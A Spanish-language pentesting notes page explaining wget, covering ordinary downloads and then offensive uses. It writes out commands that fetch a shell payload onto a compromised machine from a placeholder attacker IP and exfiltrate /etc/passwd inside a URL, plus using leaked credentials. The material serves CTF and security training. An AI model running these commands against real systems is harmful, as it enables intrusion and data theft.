Security Layer
Research Articles 🔎🎵👽GitHub
  • Bienvenido a Security Layer
  • 👾Hack The Box
    • 👾HACK THE BOX
    • Archetype
    • Responder
    • Three
  • Crocodile
  • Unrested
  • Shibboleth
  • Active
  • Bastion
  • Access
  • Devel
  • Optimum
  • Cicada
  • Forest
  • Sauna
  • Support
  • 👾Try Hackme
    • 👾TRY HACKME
    • Attacking Kerberos
  • 🛠️Tools
    • 🛠️Tools
    • Suite Impacket
    • SMBmap
    • SMBclient
    • WinPEAS
    • EvilWinRM
  • Wfuzz
  • Responder
  • John The Ripper
  • Gobuster
  • Hydra
  • Ffuf
  • nxc
  • Enum4Linux/Enum4Linux-ng
  • Crear Diccionarios
  • Kerbrute
  • Microsoft Windows
    • MSSQL
    • Glosario
  • ⚠️Scripts
    • Shell.ps1
    • Common shell Payloads
  • Comand Line Tools
    • Comand Line Tools Linux
    • Wget
    • Strings
    • Compartir y descargar recursos
    • Comand Line Tools Windows
    • Enumerar permisos de usuarios
    • Listar o identificar ficheros especificos
  • AWS
    • Conexiones a Bucket s3
Powered by GitBook
On this page
  1. Comand Line Tools

Wget

permite descargar archivos desde la web a través de protocolos como HTTP, HTTPS y FTP. Su nombre viene de "World Wide Web get".

🧰 ¿Para qué sirve wget normalmente?

  • Descargar archivos desde Internet.

  • Reanudar descargas interrumpidas (-c).

  • Descargar recursivamente sitios web completos (-r).

  • Trabajar en segundo plano (background).

  • Soporte para autenticación básica (--user, --password).

  • Soporte para proxies.


🔓 ¿Cómo se usa wget en seguridad ofensiva?

En contextos de pentesting, CTFs, o red team, wget es muy útil para:

1. Descargar herramientas en máquinas comprometidas

Una vez que comprometes un sistema (por ejemplo, con RCE o una shell básica), puedes usar wget para descargar:

┌──(dante㉿hunter)-[/home/kali]
└─# wget http://tu_ip/shell.sh -O /tmp/shell.sh

Esto puede ser una reverse shell, un script de enumeración (como linpeas), o cualquier payload.


2. Exfiltración de datos

Puedes usar wget para enviar datos a un servidor bajo tu control:

┌──(dante㉿hunter)-[/home/kali]
└─# wget http://tu_ip:8000/$(cat /etc/passwd)

Esto hará que el sistema víctima intente acceder a una URL que contiene el contenido del archivo, lo cual puede aparecer en tus logs.


3. Enumeración de directorios

Combinado con flags como --spider, puedes usarlo para verificar si una URL o archivo existe sin descargar:

┌──(dante㉿hunter)-[/home/kali]
└─# wget --spider http://target.com/secret/hidden.php

4. Descarga recursiva para clonar sitios

Esto puede ser útil si quieres analizar un sitio offline o buscar comentarios ocultos en HTML:

┌──(dante㉿hunter)-[/home/kali]
└─# wget -r -np -k http://objetivo.com

5. Bypass de restricciones de user-agent

Algunos sitios bloquean descargas si no detectan un navegador. Puedes falsificar el user-agent:

┌──(dante㉿hunter)-[/home/kali]
└─# wget --user-agent="Mozilla/5.0" http://target.com

6. Descarga con autenticación básica

Si encuentras credenciales filtradas, puedes usarlas con:

┌──(dante㉿hunter)-[/home/kali]
└─# wget --user=admin --password=1234 http://target.com/secret.zip

Last updated 1 month ago